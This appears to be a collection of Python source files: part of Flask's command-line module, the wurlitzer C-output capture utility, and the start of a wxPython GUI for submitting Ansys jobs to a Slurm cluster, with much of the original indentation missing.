'you sure it contains a Flask application? Maybe '
'you wrapped it in a WSGI middleware or you are '
'using a factory function.' % module.__name__)
def prepare_exec_for_file(filename):
"""Given a filename this will try to calculate the python path, add it
to the search path and return the actual module name that is expected.
"""
module = []
# Chop off file extensions or package markers
if os.path.split(filename)[1] == '__init__.py':
filename = os.path.dirname(filename)
elif filename.endswith('.py'):
filename = filename[:-3]
else:
raise NoAppException('The file provided (%s) does exist but is not a '
'valid Python file. This means that it cannot '
'be used as application. Please change the '
'extension to .py' % filename)
filename = os.path.realpath(filename)
dirpath = filename
while 1:
dirpath, extra = os.path.split(dirpath)
module.append(extra)
if not os.path.isfile(os.path.join(dirpath, '__init__.py')):
break
sys.path.insert(0, dirpath)
return '.'.join(module[::-1])
def locate_app(app_id):
"""Attempts to locate the application."""
__traceback_hide__ = True
if ':' in app_id:
module, app_obj = app_id.split(':', 1)
else:
module = app_id
app_obj = None
try:
__import__(module)
except ImportError:
# Reraise the ImportError if it occurred within the imported module.
# Determine this by checking whether the trace has a depth > 1.
if sys.exc_info()[-1].tb_next:
raise
else:
raise NoAppException('The file/path provided (%s) does not appear'
' to exist. Please verify the path is '
'correct. If app is not on PYTHONPATH, '
'ensure the extension is .py' % module)
mod = sys.modules[module]
if app_obj is None:
app = find_best_app(mod)
else:
app = getattr(mod, app_obj, None)
if app is None:
raise RuntimeError('Failed to find application in module "%s"'
% module)
return app
def find_default_import_path():
app = os.environ.get('FLASK_APP')
if app is None:
return
if os.path.isfile(app):
return prepare_exec_for_file(app)
return app
def get_version(ctx, param, value):
if not value or ctx.resilient_parsing:
return
message = 'Flask %(version)s\nPython %(python_version)s'
click.echo(message % {
'version': __version__,
'python_version': sys.version,
}, color=ctx.color)
ctx.exit()
version_option = click.Option(['--version'],
help='Show the flask version',
expose_value=False,
callback=get_version,
is_flag=True, is_eager=True)
class DispatchingApp(object):
"""Special application that dispatches to a Flask application which
is imported by name in a background thread. If an error happens
it is recorded and shown as part of the WSGI handling which in case
of the Werkzeug debugger means that it shows up in the browser.
"""
def __init__(self, loader, use_eager_loading=False):
self.loader = loader
self._app = None
self._lock = Lock()
self._bg_loading_exc_info = None
if use_eager_loading:
self._load_unlocked()
else:
self._load_in_background()
def _load_in_background(self):
def _load_app():
__traceback_hide__ = True
with self._lock:
try:
self._load_unlocked()
except Exception:
self._bg_loading_exc_info = sys.exc_info()
t = Thread(target=_load_app, args=())
t.start()
def _flush_bg_loading_exception(self):
__traceback_hide__ = True
exc_info = self._bg_loading_exc_info
if exc_info is not None:
self._bg_loading_exc_info = None
reraise(*exc_info)
def _load_unlocked(self):
__traceback_hide__ = True
self._app = rv = self.loader()
self._bg_loading_exc_info = None
return rv
def __call__(self, environ, start_response):
__traceback_hide__ = True
if self._app is not None:
return self._app(environ, start_response)
self._flush_bg_loading_exception()
with self._lock:
if self._app is not None:
rv = self._app
else:
rv = self._load_unlocked()
return rv(environ, start_response)
class ScriptInfo(object):
"""Help object to deal with Flask applications. This is usually not
necessary to interface with as it's used internally in the dispatching
to click. In future versions of Flask this object will most likely play
a bigger role. Typically it's created automatically by the
:class:`FlaskGroup` but you can also manually create it and pass it
onwards as click object.
"""
def __init__(self, app_import_path=None, create_app=None):
if create_app is None:
if app_import_path is None:
app_import_path = find_default_import_path()
self.app_import_path = app_import_path
else:
app_import_path = None
#: Optionally the import path for the Flask application.
self.app_import_path = app_import_path
#: Optionally a function that is passed the script info to create
#: the instance of the application.
self.create_app = create_app
#: A dictionary with arbitrary data that can be associated with
#: this script info.
self.data = {}
self._loaded_app = None
def load_app(self):
"""Loads the Flask app (if not yet loaded) and returns it. Calling
this multiple times will just result in the already loaded app to
be returned.
"""
__traceback_hide__ = True
if self._loaded_app is not None:
return self._loaded_app
if self.create_app is not None:
rv = self.create_app(self)
else:
if not self.app_import_path:
raise NoAppException(
'Could not locate Flask application. You did not provide '
'the FLASK_APP environment variable.\n\nFor more '
'information see '
'http://flask.pocoo.org/docs/latest/quickstart/')
rv = locate_app(self.app_import_path)
debug = get_debug_flag()
if debug is not None:
rv.debug = debug
self._loaded_app = rv
return rv
pass_script_info = click.make_pass_decorator(ScriptInfo, ensure=True)
def with_appcontext(f):
"""Wraps a callback so that it's guaranteed to be executed with the
script's application context. If callbacks are registered directly
to the ``app.cli`` object then they are wrapped with this function
by default unless it's disabled.
"""
@click.pass_context
def decorator(__ctx, *args, **kwargs):
with __ctx.ensure_object(ScriptInfo).load_app().app_context():
return __ctx.invoke(f, *args, **kwargs)
return update_wrapper(decorator, f)
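# Illustrative sketch (not part of Flask itself): a plain click command whose
# body runs inside the application context thanks to with_appcontext. It is
# defined here purely for demonstration and is never registered with a group.
@click.command('example-dump-config', short_help='Illustrative example only.')
@with_appcontext
def _example_dump_config_command():
    # current_app is usable here exactly as it would be during a request.
    from flask import current_app
    click.echo(repr(dict(current_app.config)))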
class AppGroup(click.Group):
"""This works similar to a regular click :class:`~click.Group` but it
changes the behavior of the :meth:`command` decorator so that it
automatically wraps the functions in :func:`with_appcontext`.
Not to be confused with :class:`FlaskGroup`.
"""
def command(self, *args, **kwargs):
"""This works exactly like the method of the same name on a regular
:class:`click.Group` but it wraps callbacks in :func:`with_appcontext`
unless it's disabled by passing ``with_appcontext=False``.
"""
wrap_for_ctx = kwargs.pop('with_appcontext', True)
def decorator(f):
if wrap_for_ctx:
f = with_appcontext(f)
return click.Group.command(self, *args, **kwargs)(f)
return decorator
def group(self, *args, **kwargs):
"""This works exactly like the method of the same name on a regular
:class:`click.Group` but it defaults the group class to
:class:`AppGroup`.
"""
kwargs.setdefault('cls', AppGroup)
return click.Group.group(self, *args, **kwargs)
class FlaskGroup(AppGroup):
"""Special subclass of the :class:`AppGroup` group that supports
loading more commands from the configured Flask app. Normally a
developer does not have to interface with this class but there are
some very advanced use cases for which it makes sense to create an
instance of this.
    For information on why this is useful see :ref:`custom-scripts`.
    :param add_default_commands: if this is True then the default run and
        shell commands will be added.
:param add_version_option: adds the ``--version`` option.
:param create_app: an optional callback that is passed the script info
and returns the loaded app.
"""
def __init__(self, add_default_commands=True, create_app=None,
add_version_option=True, **extra):
params = list(extra.pop('params', None) or ())
if add_version_option:
params.append(version_option)
AppGroup.__init__(self, params=params, **extra)
self.create_app = create_app
if add_default_commands:
self.add_command(run_command)
self.add_command(shell_command)
self._loaded_plugin_commands = False
def _load_plugin_commands(self):
if self._loaded_plugin_commands:
return
try:
import pkg_resources
except ImportError:
self._loaded_plugin_commands = True
return
for ep in pkg_resources.iter_entry_points('flask.commands'):
self.add_command(ep.load(), ep.name)
self._loaded_plugin_commands = True
def get_command(self, ctx, name):
self._load_plugin_commands()
# We load built-in commands first as these should always be the
# same no matter what the app does. If the app does want to
# override this it needs to make a custom instance of this group
# and not attach the default commands.
#
# This also means that the script stays functional in case the
# application completely fails.
rv = AppGroup.get_command(self, ctx, name)
if rv is not None:
return rv
info = ctx.ensure_object(ScriptInfo)
try:
rv = info.load_app().cli.get_command(ctx, name)
if rv is not None:
return rv
except NoAppException:
pass
def list_commands(self, ctx):
self._load_plugin_commands()
# The commands available is the list of both the application (if
# available) plus the builtin commands.
rv = set(click.Group.list_commands(self, ctx))
info = ctx.ensure_object(ScriptInfo)
try:
rv.update(info.load_app().cli.list_commands(ctx))
except Exception:
# Here we intentionally swallow all exceptions as we don't
# want the help page to break if the app does not exist.
# If someone attempts to use the command we try to create
# the app again and this will give us the error.
pass
return sorted(rv)
def main(self, *args, **kwargs):
obj = kwargs.get('obj')
if obj is None:
obj = ScriptInfo(create_app=self.create_app)
kwargs['obj'] = obj
kwargs.setdefault('auto_envvar_prefix', 'FLASK')
return AppGroup.main(self, *args, **kwargs)
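# Illustrative sketch (not part of Flask itself) of the "custom scripts" pattern
# this group enables: a management script that always loads one specific app
# through a factory. ``myapp``/``create_my_app`` are placeholder names.
#
#     import click
#     from flask.cli import FlaskGroup
#
#     def create_my_app(info):
#         from myapp import create_app
#         return create_app()
#
#     @click.group(cls=FlaskGroup, create_app=create_my_app)
#     def cli():
#         """Management script for myapp."""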
@click.command('run', short_help='Runs a development server.')
@click.option('--host', '-h', default='127.0.0.1',
help='The interface to bind to.')
@click.option('--port', '-p', default=5000,
help='The port to bind to.')
@click.option('--reload/--no-reload', default=None,
help='Enable or disable the reloader. By default the reloader '
'is active if debug is enabled.')
@click.option('--debugger/--no-debugger', default=None,
help='Enable or disable the debugger. By default the debugger '
'is active if debug is enabled.')
@click.option('--eager-loading/--lazy-loader', default=None,
help='Enable or disable eager loading. By default eager '
'loading is enabled if the reloader is disabled.')
@click.option('--with-threads/--without-threads', default=False,
help='Enable or disable multithreading.')
@pass_script_info
def run_command(info, host, port, reload, debugger, eager_loading,
with_threads):
"""Runs a local development server for the Flask application.
This local server is recommended for development purposes only but it
can also be used for simple intranet deployments. By default it will
not support any sort of concurrency at all to simplify debugging. This
can be changed with the --with-threads option which will enable basic
multithreading.
The reloader and debugger are by default enabled if the debug flag of
Flask is enabled and disabled otherwise.
"""
from werkzeug.serving import run_simple
debug = get_debug_flag()
if reload is None:
reload = bool(debug)
if debugger is None:
debugger = bool(debug)
if eager_loading is None:
eager_loading = not reload
app = DispatchingApp(info.load_app, use_eager_loading=eager_loading)
# Extra startup messages. This depends a bit on Werkzeug internals to
# not double execute when the reloader kicks in.
if os.environ.get('WERKZEUG_RUN_MAIN') != 'true':
# If we have an import path we can print it out now which can help
# people understand what's being served. If we do not have an
# import path because the app was loaded through a callback then
# we won't print anything.
if info.app_import_path is not None:
print(' * Serving Flask app "%s"' % info.app_import_path)
if debug is not None:
print(' * Forcing debug mode %s' % (debug and 'on' or 'off'))
run_simple(host, port, app, use_reloader=reload,
use_debugger=debugger, threaded=with_threads)
@click.command('shell', short_help='Runs a shell in the app context.')
@with_appcontext
def shell_command():
"""Runs an interactive Python shell in the context of a given
Flask application. The application will populate the default
    namespace of this shell according to its configuration.
    This is useful for executing small snippets of management code
    without having to manually configure the application.
"""
import code
from flask.globals import _app_ctx_stack
app = _app_ctx_stack.top.app
banner = 'Python %s on %s\nApp: %s%s\nInstance: %s' % (
sys.version,
sys.platform,
app.import_name,
app.debug and ' [debug]' or '',
app.instance_path,
)
ctx = {}
# Support the regular Python interpreter startup script if someone
# is using it.
startup = os.environ.get('PYTHONSTARTUP')
if startup and os.path.isfile(startup):
with open(startup, 'r') as f:
eval(compile(f.read(), startup, 'exec'), ctx)
ctx.update(app.make_shell_context())
code.interact(banner=banner, local=ctx)
cli = FlaskGroup(help="""\
This shell command acts as general utility script for Flask applications.
It loads the application configured (through the FLASK_APP environment
variable) and then provides commands either provided by the application or
Flask itself.
The most useful commands are the "run" and "shell" command.
Example usage:
\b
%(prefix)s%(cmd)s FLASK_APP=hello.py
%(prefix)s%(cmd)s FLASK_DEBUG=1
%(prefix)sflask run
""" % {
'cmd': os.name == 'posix' and 'export' or 'set',
'prefix': os.name == 'posix' and '$ ' or '',
})
def main(as_module=False):
this_module = __package__ + '.cli'
args = sys.argv[1:]
if as_module:
if sys.version_info >= (2, 7):
name = 'python -m ' + this_module.rsplit('.', 1)[0]
else:
name = 'python -m ' + this_module
# This module is always executed as "python -m flask.run" and as such
# we need to ensure that we restore the actual command line so that
# the reloader can properly operate.
sys.argv = ['-m', this_module] + sys.argv[1:]
else:
name = None
cli.main(args=args, prog_name=name)
if __name__ == '__main__':
main(as_module=True)
|
wurlitzer.py
|
"""Capture C-level FD output on pipes
Use `wurlitzer.pipes` or `wurlitzer.sys_pipes` as context managers.
"""
from __future__ import print_function
__version__ = '0.2.1.dev'
__all__ = [
'Wurlitzer',
]
from contextlib import contextmanager
import ctypes
from fcntl import fcntl, F_GETFL, F_SETFL
import io
import os
import select
import sys
import threading
libc = ctypes.CDLL(None)
try:
c_stdout_p = ctypes.c_void_p.in_dll(libc, 'stdout')
c_stderr_p = ctypes.c_void_p.in_dll(libc, 'stderr')
except ValueError: # pragma: no cover
    # libc.stdout has a funny name on OS X
c_stdout_p = ctypes.c_void_p.in_dll(libc, '__stdoutp') # pragma: no cover
c_stderr_p = ctypes.c_void_p.in_dll(libc, '__stderrp') # pragma: no cover
STDOUT = 2
PIPE = 3
_default_encoding = getattr(sys.stdin, 'encoding', None) or 'utf8'
if _default_encoding.lower() == 'ascii':
# don't respect ascii
_default_encoding = 'utf8' # pragma: no cover
class Wurlitzer(object):
"""Class for Capturing Process-level FD output via dup2
Typically used via `wurlitzer.capture`
"""
flush_interval = 0.2
def __init__(self, stdout=None, stderr=None, encoding=_default_encoding):
"""
Parameters
----------
stdout: stream or None
The stream for forwarding stdout.
        stderr: stream or None
The stream for forwarding stderr.
encoding: str or None
The encoding to use, if streams should be interpreted as text.
"""
self._stdout = stdout
if stderr == STDOUT:
self._stderr = self._stdout
else:
self._stderr = stderr
self.encoding = encoding
self._save_fds = {}
self._real_fds = {}
self._handlers = {}
self._handlers['stderr'] = self._handle_stderr
self._handlers['stdout'] = self._handle_stdout
def _setup_pipe(self, name):
real_fd = getattr(sys, '__%s__' % name).fileno()
save_fd = os.dup(real_fd)
self._save_fds[name] = save_fd
pipe_out, pipe_in = os.pipe()
os.dup2(pipe_in, real_fd)
os.close(pipe_in)
self._real_fds[name] = real_fd
# make pipe_out non-blocking
flags = fcntl(pipe_out, F_GETFL)
fcntl(pipe_out, F_SETFL, flags|os.O_NONBLOCK)
return pipe_out
def _decode(self, data):
"""Decode data, if any
        Called before passing to stdout/stderr streams
"""
if self.encoding:
data = data.decode(self.encoding, 'replace')
return data
def _handle_stdout(self, data):
if self._stdout:
self._stdout.write(self._decode(data))
def _handle_stderr(self, data):
if self._stderr:
self._stderr.write(self._decode(data))
def _setup_handle(self):
"""Setup handle for output, if any"""
self.handle = (self._stdout, self._stderr)
def _finish_handle(self):
"""Finish handle, if anything should be done when it's all wrapped up."""
pass
def __enter__(self):
# flush anything out before starting
libc.fflush(c_stdout_p)
libc.fflush(c_stderr_p)
# setup handle
self._setup_handle()
# create pipe for stdout
pipes = []
names = {}
if self._stdout:
pipe = self._setup_pipe('stdout')
pipes.append(pipe)
names[pipe] = 'stdout'
if self._stderr:
pipe = self._setup_pipe('stderr')
pipes.append(pipe)
names[pipe] = 'stderr'
def forwarder():
"""Forward bytes on a pipe to stream messages"""
while True:
# flush libc's buffers before calling select
# See Calysto/metakernel#5: flushing sometimes blocks.
# libc.fflush(c_stdout_p)
# libc.fflush(c_stderr_p)
r, w, x = select.select(pipes, [], [], self.flush_interval)
if not r:
# nothing to read, next iteration will flush and check again
continue
for pipe in r:
name = names[pipe]
data = os.read(pipe, 1024)
if not data:
# pipe closed, stop polling
pipes.remove(pipe)
else:
handler = getattr(self, '_handle_%s' % name)
handler(data)
if not pipes:
# pipes closed, we are done
break
self.thread = threading.Thread(target=forwarder)
self.thread.daemon = True
self.thread.start()
return self.handle
def __exit__(self, exc_type, exc_value, traceback):
# flush the underlying C buffers
libc.fflush(c_stdout_p)
libc.fflush(c_stderr_p)
# close FDs, signaling output is complete
for real_fd in self._real_fds.values():
os.close(real_fd)
self.thread.join()
# restore original state
for name, real_fd in self._real_fds.items():
save_fd = self._save_fds[name]
os.dup2(save_fd, real_fd)
os.close(save_fd)
# finalize handle
self._finish_handle()
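# Minimal usage sketch (an assumption about intended use, not part of the
# original module): capture C-level stdout written through libc into a StringIO.
if __name__ == '__main__':
    _captured = io.StringIO()
    with Wurlitzer(stdout=_captured):
        libc.printf(b'hello from C-level stdout\n')
    print('captured:', _captured.getvalue())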
|
run_gui.py
|
"""
IMPORTANT usage note:
place slurm_settings.areg in the same folder where the script is located;
modify cluster_configuration.json according to the cluster configuration
and the builds available
"""
import argparse
import errno
import getpass
import json
import os
import re
import shutil
import signal
import socket
import subprocess
import sys
import threading
import time
from collections import OrderedDict
from datetime import datetime
import requests
import wx
import wx._core
import wx.dataview
from influxdb import InfluxDBClient
from wx.lib.wordwrap import wordwrap
from gui.src_gui import GUIFrame
__authors__ = "Maksim Beliaev, Leon Voss"
__version__ = "v3.2.3"
STATISTICS_SERVER = "OTTBLD02"
STATISTICS_PORT = 8086
FIREFOX = "/bin/firefox" # path to installation of firefox for Overwatch
# read cluster configuration from a file
cluster_configuration_file = os.path.join(os.path.dirname(os.path.realpath(__file__)), "cluster_configuration.json")
try:
with open(cluster_configuration_file) as config_file:
cluster_config = json.load(config_file, object_pairs_hook=OrderedDict)
except FileNotFoundError:
print("\nConfiguration file does not exist!\nCheck existence of " + cluster_configuration_file)
sys.exit()
except json.decoder.JSONDecodeError:
print(
"\nConfiguration file is wrong!\nCheck format of {} \nOnly double quotes are allowed!".format(
cluster_configuration_file
)
)
sys.exit()
try:
path_to_ssh = cluster_config["path_to_ssh"]
overwatch_url = cluster_config["overwatch_url"]
overwatch_api_url = cluster_config["overwatch_api_url"]
# dictionary for the versions
default_version = cluster_config["default_version"]
install_dir = cluster_config["install_dir"]
# define queue dependent number of cores and RAM per node (interactive mode)
queue_config_dict = cluster_config["queue_config_dict"]
# dictionary in which we will pop up dynamically information about the load from the OverWatch
# this dictionary also serves to define parallel environments for each queue
default_queue = cluster_config["default_queue"]
project_path = cluster_config["user_project_path_root"]
admin_env_vars = cluster_config.pop("environment_vars", None)
except KeyError as key_e:
print(
(
"\nConfiguration file is wrong!\nCheck format of {} \nOnly double quotes are allowed."
+ "\nFollowing key does not exist: {}"
).format(cluster_configuration_file, key_e.args[0])
)
sys.exit()
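# Illustrative sketch of the minimal structure cluster_configuration.json is
# expected to have, derived only from the keys read above; all values below are
# placeholders and must be replaced with the real cluster configuration:
#
#   {
#       "path_to_ssh": "/usr/bin/ssh",
#       "overwatch_url": "http://overwatch.example.com",
#       "overwatch_api_url": "http://overwatch.example.com:8080",
#       "default_version": "2023R1",
#       "install_dir": {"2023R1": "/apps/AnsysEM/v231/Linux64"},
#       "queue_config_dict": {"euler": {"cores": 28, "ram": 256}},
#       "default_queue": "euler",
#       "user_project_path_root": "/projects",
#       "environment_vars": {},
#       "vnc_nodes": ["vnc01"],
#       "dcv_nodes": ["dcv01"]
#   }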
parser = argparse.ArgumentParser()
parser.add_argument("--debug", help="Debug mode", action="store_true")
cli_args = parser.parse_args()
DEBUG_MODE = cli_args.debug
# create keys for usage statistics that would be updated later
queue_dict = {name: {} for name in queue_config_dict}
for queue_val in queue_dict.values():
queue_val["total_cores"] = 100
queue_val["avail_cores"] = 0
queue_val["used_cores"] = 100
queue_val["reserved_cores"] = 0
queue_val["failed_cores"] = 0
# list to keep information about running jobs
qstat_list = []
log_dict = {"pid": "0", "msg": "None", "scheduler": False}
class ClearMsgPopupMenu(wx.Menu):
def __init__(self, parent):
super(ClearMsgPopupMenu, self).__init__()
self.parent = parent
mmi = wx.MenuItem(self, wx.NewId(), "Clear All Messages")
self.Append(mmi)
self.Bind(wx.EVT_MENU, self.on_clear, mmi)
def on_clear(self, *args):
self.parent.scheduler_msg_viewlist.DeleteAllItems()
self.parent.log_data = {"Message List": [], "PID List": [], "GUI Data": []}
if os.path.isfile(self.parent.logfile):
os.remove(self.parent.logfile)
# create new custom events: they are bound in the main thread and posted from
# subthreads, because the UI must be changed ONLY from the MAIN THREAD
my_SIGNAL_EVT = wx.NewEventType()
SIGNAL_EVT = wx.PyEventBinder(my_SIGNAL_EVT, 1)
# signal - qstat
NEW_SIGNAL_EVT_QSTAT = wx.NewEventType()
SIGNAL_EVT_QSTAT = wx.PyEventBinder(NEW_SIGNAL_EVT_QSTAT, 1)
# signal - log message
NEW_SIGNAL_EVT_LOG = wx.NewEventType()
SIGNAL_EVT_LOG = wx.PyEventBinder(NEW_SIGNAL_EVT_LOG, 1)
# signal - status bar
NEW_SIGNAL_EVT_BAR = wx.NewEventType()
SIGNAL_EVT_BAR = wx.PyEventBinder(NEW_SIGNAL_EVT_BAR, 1)
class SignalEvent(wx.PyCommandEvent):
"""Event to signal that we are ready to update the plot"""
def __init__(self, etype, eid):
"""Creates the event object"""
wx.PyCommandEvent.__init__(self, etype, eid)
class ClusterLoadUpdateThread(threading.Thread):
def __init__(self, parent):
"""
@param parent: The gui object that should receive the value
"""
threading.Thread.__init__(self)
self._parent = parent
def run(self):
"""Overrides Thread.run.
Don't call this directly its called internally when you call
Thread.start().
Gets cluster load every 60 seconds. 0.5s step is used to be
able to stop subthread earlier by triggering parent.running
Update a list of jobs status for a user every 5s
"""
counter = 120
while self._parent.running:
if counter % 120 == 0:
try:
self.parse_cluster_load()
except (requests.exceptions.BaseHTTPError, requests.exceptions.RequestException):
print("Cannot reach OverWatch server")
except KeyError:
print("Cannot parse OverWatch data. Probably Service is down.")
counter = 0
if counter % 10 == 0:
self.parse_user_jobs()
time.sleep(0.5)
counter += 1
def parse_user_jobs(self):
qstat_list.clear()
slurm_stat_output = subprocess.check_output(self._parent.squeue, shell=True)
slurm_stat_output = slurm_stat_output.decode("ascii", errors="ignore")
exclude = cluster_config["vnc_nodes"] + cluster_config["dcv_nodes"]
for i, line in enumerate(slurm_stat_output.split("\n")[1:]):
pid = line[0:18].strip()
# partition = line[19:28].strip()
job_name = line[29:38].strip()
user = line[38:47].strip()
state = line[48:49].strip()
num_cpu = line[50:54].strip()
started = line[54:75].strip()
node_list = line[76:].strip()
for node in exclude:
if node in node_list:
break
else:
# it is neither VNC nor DCV job
qstat_list.append(
{
"pid": pid,
"state": state,
"name": job_name,
"user": user,
"queue_data": node_list,
"proc": num_cpu,
"started": started,
}
)
evt = SignalEvent(NEW_SIGNAL_EVT_QSTAT, -1)
wx.PostEvent(self._parent, evt)
# get message texts
for pid in self._parent.log_data["PID List"]:
o_file = os.path.join(self._parent.user_dir, "ansysedt.o" + pid)
if os.path.exists(o_file):
output_text = ""
with open(o_file, "r") as file:
for msgline in file:
output_text += msgline
if output_text != "":
log_dict["pid"] = pid
log_dict["msg"] = "Submit Message: " + output_text
log_dict["scheduler"] = True
evt = SignalEvent(NEW_SIGNAL_EVT_LOG, -1)
wx.PostEvent(self._parent, evt)
os.remove(o_file)
e_file = os.path.join(self._parent.user_dir, "ansysedt.e" + pid)
if os.path.exists(e_file):
error_text = ""
with open(e_file, "r") as file:
for msgline in file:
error_text += msgline
if error_text != "":
log_dict["pid"] = pid
log_dict["msg"] = "Submit Error: " + error_text
log_dict["scheduler"] = True
evt = SignalEvent(NEW_SIGNAL_EVT_LOG, -1)
wx.PostEvent(self._parent, evt)
os.remove(e_file)
def parse_cluster_load(self):
"""Parse data from Overwatch and generates dictionary with cluster load for each queue."""
# with requests.get(overwatch_url, params={"cluster": "ott"}) as url_req: # could be used with params
with requests.get(f"{overwatch_api_url}/api/v1/overwatch/minclusterstatus") as url_req:
cluster_data = url_req.json()
for queue_elem in cluster_data["QueueStatus"]:
queue_name = queue_elem["name"]
if queue_name in queue_dict:
queue_dict[queue_name]["total_cores"] = queue_elem["totalSlots"]
queue_dict[queue_name]["used_cores"] = queue_elem["totalUsedSlots"]
queue_dict[queue_name]["failed_cores"] = queue_elem["totalUnavailableSlots"]
queue_dict[queue_name]["reserved_cores"] = queue_elem["totalReservedSlots"]
queue_dict[queue_name]["avail_cores"] = queue_elem["totalAvailableSlots"]
evt = SignalEvent(my_SIGNAL_EVT, -1)
wx.PostEvent(self._parent, evt)
class FlashStatusBarThread(threading.Thread):
def __init__(self, parent):
"""
@param parent: The gui object that should receive the value
"""
threading.Thread.__init__(self)
self._parent = parent
def run(self):
"""Overrides Thread.run. Don't call this directly its called internally
when you call Thread.start().
alternates the color of the status bar for run_sec (6s) to take attention
at the end clears the status message
"""
if self._parent.bar_level == "i":
alternating_color = wx.GREEN
elif self._parent.bar_level == "!":
alternating_color = wx.RED
run_sec = 6
for i in range(run_sec * 2):
self._parent.bar_color = wx.WHITE if i % 2 == 0 else alternating_color
if i == run_sec * 2 - 1:
self._parent.bar_text = "No Status Message"
self._parent.bar_color = wx.WHITE
evt = SignalEvent(NEW_SIGNAL_EVT_BAR, -1)
wx.PostEvent(self._parent, evt)
time.sleep(0.5)
class LauncherWindow(GUIFrame):
def __init__(self, parent):
global default_queue
# Initialize the main form
GUIFrame.__init__(self, parent)
GUIFrame.SetTitle(self, f"Ansys Electronics Desktop Launcher {__version__}")
# Get environment data
self.user_dir = os.path.expanduser("~")
self.app_dir = self.ensure_app_folder()
self.username = getpass.getuser()
self.hostname = socket.gethostname()
self.display_node = os.getenv("DISPLAY")
self.squeue = 'squeue --me --format "%.18i %.9P %.8j %.8u %.2t %.4C %.20V %R"'
# get paths
self.user_build_json = os.path.join(self.app_dir, "user_build.json")
self.default_settings_json = os.path.join(self.app_dir, "default.json")
self.builds_data = {}
self.default_settings = {}
# generate list of products for registry
self.products = {}
for key in list(install_dir.keys()):
try:
with open(os.path.join(install_dir[key], "config", "ProductList.txt")) as file:
self.products[key] = next(file).rstrip() # get first line
except FileNotFoundError:
print(f"Installation is corrupted {install_dir[key]}")
install_dir.pop(key)
# set default project path
self.path_textbox.Value = os.path.join(project_path, self.username)
self.display_node = self.check_display_var()
# check if we are on VNC or DCV node
viz_type = None
for node in cluster_config["vnc_nodes"]:
if node in self.display_node:
viz_type = "VNC"
break
else:
for node in cluster_config["dcv_nodes"]:
if node in self.display_node:
viz_type = "DCV"
break
msg = "No Status Message"
if viz_type is None:
add_message(
message=(
"Display Type is unknown: cannot identify VNC/DCV. "
"Interactive Submission might fail.\n"
"Contact cluster administrator."
),
title="Display Type Error",
icon="!",
)
msg = "Warning: Unknown Display Type!!"
viz_type = ""
# Set the status bars on the bottom of the window
self.m_status_bar.SetStatusText(f"User: {self.username} on {viz_type} node {self.display_node}", 0)
self.m_status_bar.SetStatusText(msg, 1)
self.m_status_bar.SetStatusWidths([500, -1])
init_combobox(install_dir.keys(), self.m_select_version1, default_version)
# Setup Process Log
self.scheduler_msg_viewlist.AppendTextColumn("Timestamp", width=140)
self.scheduler_msg_viewlist.AppendTextColumn("PID", width=75)
self.scheduler_msg_viewlist.AppendTextColumn("Message")
self.logfile = os.path.join(self.app_dir, "user_log_" + viz_type + ".json")
# read in previous log file
self.log_data = {"Message List": [], "PID List": [], "GUI Data": []}
if os.path.exists(self.logfile):
try:
with open(self.logfile, "r") as file:
self.log_data = json.load(file)
self.update_msg_list()
except json.decoder.JSONDecodeError:
print("Error reading log file")
os.remove(self.logfile)
# initialize the table with User Defined Builds
self.user_build_viewlist.AppendTextColumn("Build Name", width=150)
self.user_build_viewlist.AppendTextColumn("Build Path", width=640)
self.set_user_jobs_viewlist()
self.set_cluster_load_table()
# Disable Pre-Post/Interactive radio button in case of DCV
if viz_type == "DCV":
self.submit_mode_radiobox.EnableItem(3, False)
self.submit_mode_radiobox.SetSelection(0)
else:
self.submit_mode_radiobox.EnableItem(3, True)
self.submit_mode_radiobox.Select(3)
self.m_notebook2.ChangeSelection(0)
self.read_custom_builds()
# populate UI with default or pre-saved settings
if os.path.isfile(self.default_settings_json):
try:
self.settings_load()
default_queue = self.default_settings["queue"]
except KeyError:
add_message("Settings file was corrupted", "Settings file", "!")
init_combobox(queue_dict.keys(), self.queue_dropmenu, default_queue)
self.select_queue()
self.evt_node_list_check()
self.on_reserve_check()
# run in parallel to UI regular update of chart and process list
self.running = True
# bind custom event to invoke function on_signal
self.Bind(SIGNAL_EVT, self.on_signal)
self.Bind(SIGNAL_EVT_QSTAT, self.update_job_status)
self.Bind(SIGNAL_EVT_LOG, self.add_log_entry)
self.Bind(SIGNAL_EVT_BAR, self.set_status_bar)
# start a thread to update cluster load
worker = ClusterLoadUpdateThread(self)
worker.start()
self.m_nodes_list.Show(True) # required for proper rendering
# after UI is loaded run select_mode to process UI correctly, otherwise UI is shifted since sizers do not
# reserve space for hidden objects
wx.CallAfter(self.select_mode)
def set_user_jobs_viewlist(self):
"""Setup Process ViewList"""
self.qstat_viewlist.AppendTextColumn("PID", width=70)
self.qstat_viewlist.AppendTextColumn("State", width=50)
self.qstat_viewlist.AppendTextColumn("Name", width=80)
self.qstat_viewlist.AppendTextColumn("User", width=70)
self.qstat_viewlist.AppendTextColumn("Queue", width=200)
self.qstat_viewlist.AppendTextColumn("cpu", width=40)
self.qstat_viewlist.AppendTextColumn("Started", width=50)
def set_cluster_load_table(self):
"""setup cluster load table"""
self.load_grid.SetColLabelValue(0, "Available")
self.load_grid.SetColSize(0, 80)
self.load_grid.SetColLabelValue(1, "Used")
self.load_grid.SetColSize(1, 80)
self.load_grid.SetColLabelValue(2, "Reserved")
self.load_grid.SetColSize(2, 80)
self.load_grid.SetColLabelValue(3, "Failed")
self.load_grid.SetColSize(3, 80)
self.load_grid.SetColLabelValue(4, "Total")
self.load_grid.SetColSize(4, 80)
for i, queue_key in enumerate(queue_dict):
self.load_grid.AppendRows(1)
self.load_grid.SetRowLabelValue(i, queue_key)
# colors
self.load_grid.SetCellBackgroundColour(i, 0, "light green")
self.load_grid.SetCellBackgroundColour(i, 1, "red")
self.load_grid.SetCellBackgroundColour(i, 2, "light grey")
def set_status_bar(self, _unused_event=None):
self.m_status_bar.SetStatusText(self.bar_text, 1)
self.m_status_bar.SetBackgroundColour(self.bar_color)
self.m_status_bar.Refresh()
def add_status_msg(self, msg="", level="i"):
"""
        Create a thread that shows a status bar message with alternating color to attract the user's attention
:param msg: str, message text
:param level: either "i" as information for green color or "!" as error for red color
:return: None
"""
self.bar_text = msg
self.bar_level = level
self.bar_color = wx.WHITE
# start a thread to update status bar
self.worker = FlashStatusBarThread(self)
self.worker.start()
@staticmethod
def ensure_app_folder():
"""Create a path for .aedt folder if first run
Returns
str
Path to application directory.
"""
user_dir = os.path.expanduser("~")
app_dir = os.path.join(user_dir, ".aedt")
if not os.path.exists(app_dir):
try:
os.makedirs(app_dir)
except OSError as exc: # Guard against race condition
if exc.errno != errno.EEXIST:
raise
return app_dir
def on_signal(self, *args):
"""Update UI when signal comes from subthread. Should be updated always from main thread."""
